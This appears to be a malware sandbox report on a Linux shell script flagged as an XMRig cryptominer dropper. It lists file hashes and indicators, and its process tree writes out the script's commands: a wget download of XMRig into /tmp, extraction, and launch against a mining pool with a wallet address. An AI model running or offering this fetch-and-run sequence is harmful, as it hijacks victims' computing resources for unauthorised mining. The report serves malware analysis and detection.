xmrig_linux | e3a24865935df812072d57a87e460d5cbe1f5f45d6fb0f470f3182f55669e6bb

Analysis

max time kernel
20s
max time network
20s
platform
debian-9_mips
resource
debian9-mipsbe-20240226-en
resource tags

arch:mipsimage:debian9-mipsbe-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
20-03-2024 21:26

Target

start.sh
Size

573B
MD5

badbf4901e27cdee108f6ea8ba30837e
SHA1

e8f20bcae4ce68b777f43718b12125aa0cfdf6d8
SHA256

e3a24865935df812072d57a87e460d5cbe1f5f45d6fb0f470f3182f55669e6bb
SHA512

6a5e729fdad612340e1e2d4b347ada7c372db6c015b90fa126b50c74b6d356c619c3e9243b0b83fa1fc0eaf818b571afcd75fd9af34303c411c0d755353d5831

Score

10^/10

xmrig_linux miner

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral4/files/fstream-4.dat	family_xmrig
behavioral4/files/fstream-4.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig_linux

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/xmrig-6.21.1/xmrig	801	xmrig

Reads runtime system information 1 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	tar

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/xmrig-6.21.1-linux-x64.tar.gz	wget

/tmp/start.sh
/tmp/start.sh
1⤵
PID:695
- /usr/bin/wget
  wget https://github.com/xmrig/xmrig/releases/download/v6.21.1/xmrig-6.21.1-linux-x64.tar.gz -O xmrig-6.21.1-linux-x64.tar.gz
  2⤵
  - Writes file to tmp directory
  PID:697
- /bin/tar
  tar -xvf xmrig-6.21.1-linux-x64.tar.gz
  2⤵
  - Reads runtime system information
  PID:799
- - /usr/local/sbin/gzip
    gzip -d
    3⤵
    PID:800
- - /usr/local/bin/gzip
    gzip -d
    3⤵
    PID:800
- - /usr/sbin/gzip
    gzip -d
    3⤵
    PID:800
- - /usr/bin/gzip
    gzip -d
    3⤵
    PID:800
- - /sbin/gzip
    gzip -d
    3⤵
    PID:800
- - /bin/gzip
    gzip -d
    3⤵
    PID:800
- /tmp/xmrig-6.21.1/xmrig
  ./xmrig --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2lin --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
  2⤵
  - Executes dropped EXE
  PID:801

/tmp/xmrig-6.21.1/SHA256SUMS

Filesize
150B

MD5
0eeaf66a6ba6b6934ffefce538342572

SHA1
8f28c8a7345c85b2ae78924828aa16e1b6be7b97

SHA256
aa89fb25473e544be6a5cbe6a6106e220fc6cd4b935fe76bc73a19b3b6daed60

SHA512
5a8e8a77e97f2b221bf1a9097a2f19a2c3c0ed376d7e2561a41c6d74203ddbe9d0482a818d17555da44088e511b3724dd41dd7cc91e3ebaadab9c176b1a7b57d

Download Submit
/tmp/xmrig-6.21.1/config.json

Filesize
2KB

MD5
66f38c96a4901e7b345787c447842b3e

SHA1
2aa9b4d1bd2edd5d81bd9725e9318edaee67531f

SHA256
2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec

SHA512
71757fad29d6d2a257362ed28cde9f249cc8a14e646dee666c9029ea97c72de689cdf8ed5cf0365195a6a6831fe77d82efe5e2fa555c6cc5078f1f29ae8dd68f

Download Submit
/tmp/xmrig-6.21.1/xmrig

Filesize
8.5MB

MD5
c332b75871551f3983a14be3bfe2fe79

SHA1
84791db42a6f321ea70cfcbf13913fa4e02533f8

SHA256
2e7682abe30d93afb3bd9dee0011c450c1d72d727151344b8b7360441571e007

SHA512
c7ed0d0dd9833530aadd7a06b66913de02bccac929b17f0920c743c1543bc88bfd98d39c570e304f7bb8f2f87d4475176ed1bb11b026f9d8a514053cee5b808f

Download Submit